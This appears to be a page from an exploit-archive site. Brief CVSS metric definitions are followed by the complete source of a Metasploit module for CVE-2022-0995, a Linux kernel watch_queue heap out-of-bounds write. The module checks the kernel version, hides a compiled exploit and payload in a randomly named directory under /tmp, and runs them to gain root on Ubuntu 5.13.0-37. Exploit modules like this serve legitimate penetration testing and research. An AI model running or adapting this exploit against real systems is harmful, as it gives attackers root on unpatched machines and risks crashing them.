The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
None
C
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Compile
include Msf::Post::Linux::Kernel
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Watch Queue Out of Bounds Write',
'Description' => %q{
This module exploits a vulnerability in the Linux Kernel's watch_queue event
notification system. It relies on a heap out-of-bounds write in kernel memory.
The exploit may fail on the first attempt so multiple attempts may be needed.
Note that the exploit can potentially cause a denial of service if multiple
failed attemps occur, however this is unlikely.
},
'License' => MSF_LICENSE,
'Author' => [
'Jann Horn', # discovery and poc
'bonfee', # PoC
'bwatters-r7' # Aka @tychos_moose, Metasploit Module
],
'DisclosureDate' => '2022-03-14',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Privileged' => true,
'References' => [
[ 'CVE', '2022-0995' ],
[ 'URL', 'https://github.com/Bonfee/CVE-2022-0995' ],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=93ce93587d36493f2f86921fa79921b3cba63fbb' ],
[ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0995' ],
[ 'PACKETSTORM', '166770' ],
],
'Targets' => [
[ 'Ubuntu Linux 5.13.0-37', {} ],
],
'DefaultTarget' => 0,
'Notes' => {
'Reliability' => [ UNRELIABLE_SESSION ], # Not expected to get a shell every time due to heap spray sometimes not working.
'Stability' => [ CRASH_OS_DOWN ],
'SideEffects' => [ ARTIFACTS_ON_DISK ]
}
)
)
register_options [
OptBool.new('DEBUG_SOURCE', [ false, 'Use source code with debug prints to help troubleshoot', false ])
]
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def pull_version
kernel_data = kernel_release
version_array = kernel_data.split('-')
if version_array.length < 3
print_error("Failed to parse the kernel version data: #{kernel_data}")
return nil
end
vprint_status("Version array: #{version_array}")
major_version = Rex::Version.new(version_array[0])
vprint_status("major_version: #{major_version}")
minor_version = version_array[1].strip unless version_array[1].nil?
vprint_status("minor_version: #{minor_version}")
kernel_type = version_array[2].strip unless version_array[2].nil?
return [major_version, minor_version, kernel_type]
end
def module_check
# Vulnerable versions are under 5.17:rc8
# This module only has offsets for Ubuntu 5.13.0-37
if is_root? && !datastore['ForceExploit']
fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.')
end
if datastore['DEBUG_SOURCE'] && datastore['COMPILE'] != 'True'
fail_with(Failure::BadConfig, 'DEBUG_PRINT is only supported when COMPILE is set to True')
end
unless kernel_version =~ /[uU]buntu/
fail_with(Failure::NoTarget, "Unsupported Distro: '#{version}'")
end
arch = kernel_hardware
unless arch.include?('x86_64')
fail_with(Failure::NoTarget, "Unsupported architecture: '#{arch}'")
end
version_info = pull_version
if version_info.nil?
fail_with(Failure::NoTarget, 'Failed to obtain kernel version')
end
major_version, minor_version, kernel_type = version_info
vulnerable_version = Rex::Version.new('5.13.0')
unless major_version == vulnerable_version && minor_version == '37' && kernel_type.include?('generic')
fail_with(Failure::NoTarget, "No offsets for '#{kernel_release}'")
end
end
def check
# Vulnerable versions are under 5.17:rc8
# This module only has offsets for 5.13.0-37
vulnerable_version = Rex::Version.new('5.17.0')
version_info = pull_version
if version_info.nil?
return CheckCode::Unknown('Failed to obtain kernel version')
end
major_version = version_info[0]
if major_version <= vulnerable_version
return CheckCode::Appears
else
return CheckCode::Safe("The target kernel version #{major_version} is later than the last known vulnerable version aka #{vulnerable_version}")
end
end
def exploit
module_check
base_dir = datastore['WritableDir'].to_s
unless writable?(base_dir)
fail_with(Failure::BadConfig, "#{base_dir} is not writable")
end
executable_name = ".#{rand_text_alphanumeric(5..10)}"
exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
exploit_path = "#{exploit_dir}/#{executable_name}"
if file_exist?(exploit_dir)
fail_with(Failure::BadConfig, 'Exploit dir already exists')
end
mkdir(exploit_dir)
register_dir_for_cleanup(exploit_dir)
# Upload exploit
if live_compile?
vprint_status('Live compiling exploit on system...')
if datastore['DEBUG_SOURCE']
code = exploit_source('cve-2022-0995', 'cve-2022-0995_debug.c')
else
code = exploit_source('cve-2022-0995', 'cve-2022-0995.c')
end
upload_and_compile(exploit_path, code, '-no-pie -static')
else
vprint_status('Dropping pre-compiled exploit on system...')
precompiled_binary = 'cve-2022-0995.x64.elf'
vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")
upload_and_chmodx(exploit_path, exploit_data('cve-2022-0995', precompiled_binary))
end
register_file_for_cleanup(exploit_path)
# Upload payload
payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"
upload_and_chmodx(payload_path, generate_payload_exe)
# Launch exploit
print_status('Launching exploit...')
cmd_string = "#{exploit_path} #{payload_path}"
vprint_status("Running: #{cmd_string}")
begin
output = cmd_exec(cmd_string)
vprint_status(output)
rescue Error => e
elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
print_error("Exploit failed: #{e}")
print_error("Ensure deletion of #{exploit_path} and #{payload_path}")
end
end
end
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum